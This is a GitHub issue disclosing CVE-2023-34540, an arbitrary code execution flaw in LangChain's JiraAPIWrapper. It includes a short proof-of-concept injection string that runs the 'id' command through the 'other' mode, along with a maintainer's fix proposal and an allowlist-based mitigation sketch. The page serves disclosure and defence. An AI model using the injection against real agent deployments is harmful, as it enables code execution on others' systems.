CVE-2023-34540: Arbitrary code execution in JiraAPIWrapper · Issue #4833 · hwchase17/langchain

Langchain 0.0.171 is vulnerable to Arbitrary Code Execution.


Arbitrary code execution in JiraAPIWrapper #4833

Open · 0gur1 opened this issue May 17, 2023 · 1 comment

System Info

LangChain version: 0.0.171
Windows 10

Who can help?

No response

Information

  • The official example notebooks/scripts
  • My own modified scripts

Related Components

  • LLMs/Chat Models
  • Embedding Models
  • Prompts / Prompt Templates / Prompt Selectors
  • Output Parsers
  • Document Loaders
  • Vector Stores / Retrievers
  • Memory
  • Agents / Agent Executors
  • Tools / Toolkits
  • Chains
  • Callbacks/Tracing
  • Async

Reproduction

  1. Set the environment variables for jira and openai

        import os
        from langchain.utilities.jira import JiraAPIWrapper

        # Credentials the wrapper reads from the environment
        os.environ["JIRA_API_TOKEN"] = "your jira api token"
        os.environ["JIRA_USERNAME"] = "your username"
        os.environ["JIRA_INSTANCE_URL"] = "your url"
        os.environ["OPENAI_API_KEY"] = "your openai key"

  2. Run jira

        jira = JiraAPIWrapper()
        # The 'other' mode receives the query string shown here
        output = jira.run('other', "exec(\"import os;print(os.popen('id').read())\")")

  3. The id command will be executed.
     Commands can be changed to others, and attackers can execute arbitrary code.

Expected behavior

The code can be executed without any check.

@zywilliamli @hwchase17

I think the options here are to either a) check code to a limited number of allowed actions, or b) remove the “other” method from the tool.

It looks like we want the jira tool to:

  1. Create an issue
  2. search jira
  3. get projects

I’m not sure what other functionality we want to extend to with self.other, maybe y’all know how to proceed best
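Option (a) from the comment above, sketched as an added example that is not part of the original issue and is not LangChain's code: the wrapper dispatches through a fixed table of the three intended actions and treats the query strictly as data, so an "other" request fails closed. `FakeJira`, `safe_run`, `ALLOWED_MODES`, `ALLOWED_ISSUE_FIELDS` and the mode names are hypothetical names chosen for this illustration.

```python
import json

class ActionRejected(ValueError):
    """Raised when the agent asks for something outside the allowlist."""

class FakeJira:
    """Constructed stand-in for a Jira client so the example runs offline."""
    def search(self, jql):
        return f"search:{jql}"
    def projects(self):
        return ["DEMO"]
    def create_issue(self, fields):
        return f"created:{fields['summary']}"

# Fields the model may set when creating an issue (assumed policy).
ALLOWED_ISSUE_FIELDS = {"summary", "description", "project", "issuetype"}

def _create_issue(client, query):
    try:
        fields = json.loads(query)  # parsed as data, never evaluated
    except json.JSONDecodeError as exc:
        raise ActionRejected(f"create_issue expects JSON: {exc}") from None
    if not isinstance(fields, dict) or "summary" not in fields:
        raise ActionRejected("create_issue expects an object with 'summary'")
    extra = set(fields) - ALLOWED_ISSUE_FIELDS
    if extra:
        raise ActionRejected(f"fields not allowed: {sorted(extra)}")
    return client.create_issue(fields)

# Fixed table of the three intended actions; there is no 'other' entry.
ALLOWED_MODES = {
    "jql": lambda client, query: client.search(query),
    "get_projects": lambda client, query: client.projects(),
    "create_issue": _create_issue,
}

def safe_run(client, mode, query=""):
    """Dispatch by table lookup; unknown modes (including 'other') fail closed."""
    handler = ALLOWED_MODES.get(mode)
    if handler is None:
        raise ActionRejected(f"mode {mode!r} is not allowed")
    if not isinstance(query, str):
        raise ActionRejected("query must be a string")
    return handler(client, query)

# The query string from the reproduction above, used here only as inert input.
POC = "exec(\"import os;print(os.popen('id').read())\")"
```

With this dispatcher the reproduction's string is either rejected (mode `other`, or `create_issue` with non-JSON input) or handed to the search call as an ordinary string.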


Related news

GHSA-x32c-59v5-h7fg: Langchain OS Command Injection vulnerability

Langchain 0.0.171 is vulnerable to Arbitrary Code Execution via command injection in the `jira.run()` command
